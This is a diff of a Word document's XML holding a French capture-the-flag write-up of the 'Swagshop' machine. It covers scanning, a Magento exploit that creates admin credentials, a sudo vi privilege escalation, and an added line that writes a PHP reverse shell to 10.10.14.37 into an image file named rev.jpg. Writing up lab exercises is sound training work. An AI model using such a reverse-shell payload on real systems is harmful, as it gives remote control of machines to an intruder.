-  <w:style w:type="numbering" w:default="1" w:styleId="Aucuneliste">
-    <w:name w:val="No List"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Paragraphedeliste">
-    <w:name w:val="List Paragraph"/>
-    <w:basedOn w:val="Normal"/>
-    <w:uiPriority w:val="34"/>
-    <w:qFormat/>
-    <w:rsid w:val="00DD600F"/>
-    <w:pPr>
-      <w:ind w:left="720"/>
-      <w:contextualSpacing/>
-    </w:pPr>
   </w:style>
 </w:styles>
 </file>

--- a/[easy] Swagshop.docx
+++ b/[easy] Swagshop.docx
@@ -1,10 +1,18 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
   <w:body>
     <w:p>
       <w:r>
-        <w:t>[info]</w:t>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>info</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -171,20 +179,20 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>[nmap]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Deux ports sont ouverts, le port 22 pour un serveur </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ssh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> et le port 80 pour </w:t>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Deux ports sont ouverts, le port 22 pour un serveur ssh et le port 80 pour </w:t>
       </w:r>
       <w:r>
         <w:t>un serveur web.</w:t>
@@ -222,9 +230,17 @@
               <w:rPr>
                 <w:rFonts w:cstheme="minorHAnsi"/>
               </w:rPr>
-              <w:t>php,txt,html</w:t>
+              <w:t>php</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>,txt,html</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -246,16 +262,27 @@
       <w:r>
         <w:t>[</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>dirsearch</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>]</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>En allant sur le site web, nous nous rendons compte qu’il y a une API Magento qui tourne.</w:t>
+        <w:t>En attendant l’énumération des fichiers/dossiers</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> sur le site web, nous nous rendons</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> sur le site et on se rend</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> compte qu’il y a une API Magento qui tourne.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -332,7 +359,15 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>[searchsploit]</w:t>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>searchsploit</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -380,7 +415,10 @@
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
-              <w:t xml:space="preserve"> chemin ./37977</w:t>
+              <w:t xml:space="preserve"> /usr/share/exploitdb/exploits/xml/webapps/37977.py</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> ./37977</w:t>
             </w:r>
             <w:r>
               <w:t>.py</w:t>
@@ -392,99 +430,67 @@
     <w:p/>
     <w:p>
       <w:r>
+        <w:t xml:space="preserve">Après avoir passé beaucoup de temps sur l’exploit à le </w:t>
+      </w:r>
+      <w:r>
+        <w:t>réécrire</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, il finit par fonctionner :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t>[</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">L’exploit nous indique une page html avec un identifiant et un mot de passe : </w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>locatecp</w:t>
+        <w:t>forme:forme</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Après avoir passé beaucoup de temps sur l’exploit à le </w:t>
-      </w:r>
-      <w:r>
-        <w:t>réécrire</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, il finit par fonctionner :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>[exploit]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">L’exploit nous indique une page html avec un identifiant et un mot de passe : </w:t>
+        <w:t xml:space="preserve"> pour nous connecter sur l’API</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> en tant qu’Administrateur</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Nous explorons donc l’interface et il y a une section </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">pour publier un profil, dans le profil nous pouvons mettre une image, nous allons </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>forme:forme</w:t>
+        <w:t>upload</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> pour nous connecter sur l’API</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> en tant qu’Administrateur</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Nous explorons donc l’interface et il y a une section </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="36"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="36"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="36"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="36"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Obtenir un accès Administrateur</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">En faisant l’énumération de base, on se rend compte que nous pouvons exécuter l’éditeur de texte VI avec les droits </w:t>
-      </w:r>
-      <w:r>
-        <w:t>d’administrateur</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>:</w:t>
+        <w:t xml:space="preserve"> une image </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>backdooré</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> pour avoir un shell :</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -507,11 +513,98 @@
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
-              <w:t>sudo</w:t>
+              <w:t>echo</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
-              <w:t xml:space="preserve"> -l</w:t>
+              <w:t xml:space="preserve"> –e </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>"&lt; ?</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>nexec</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>'/bin/bash –c \"bash –i &gt;&amp; /</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>dev</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>/10.10.14.37/4567 0&gt;&amp;1</w:t>
+            </w:r>
+            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+            <w:bookmarkEnd w:id="0"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>\"') ;\n ?&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>"</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> &gt; rev.jpg</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -519,48 +612,49 @@
     </w:tbl>
     <w:p/>
     <w:p>
-      <w:r>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Nous allons donc sur le site </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>GTFOBin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, pour voir les manipulations à effectuer pour obtenir un </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>shell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> administrateur</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> et lire le flag root.txt</w:t>
-      </w:r>
-      <w:r>
-        <w:t> :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>https://gtfobins.github.io/gtfobins/vi/</w:t>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="36"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="36"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Obtenir un accès Administrateur</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">En faisant l’énumération de base, on se rend compte que nous pouvons exécuter l’éditeur de texte VI avec les droits </w:t>
+      </w:r>
+      <w:r>
+        <w:t>d’administrateur</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -579,6 +673,79 @@
           </w:tcPr>
           <w:p>
             <w:r>
+              <w:t xml:space="preserve">$ </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -l</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Nous allons donc sur le site </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>GTFOBin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, pour voir les manipulations à effectuer pour obtenir un </w:t>
+      </w:r>
+      <w:r>
+        <w:t>shell administrateur</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> et lire le flag root.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:t> :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>https://gtfobins.github.io/gtfobins/vi/</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9212"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9212" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
               <w:t>$</w:t>
             </w:r>
           </w:p>
@@ -604,8 +771,8 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
-  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
+  <w:abstractNum w:abstractNumId="0">
     <w:nsid w:val="3D760EA0"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="971EC05E"/>
@@ -724,7 +891,7 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -740,383 +907,144 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
-    <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
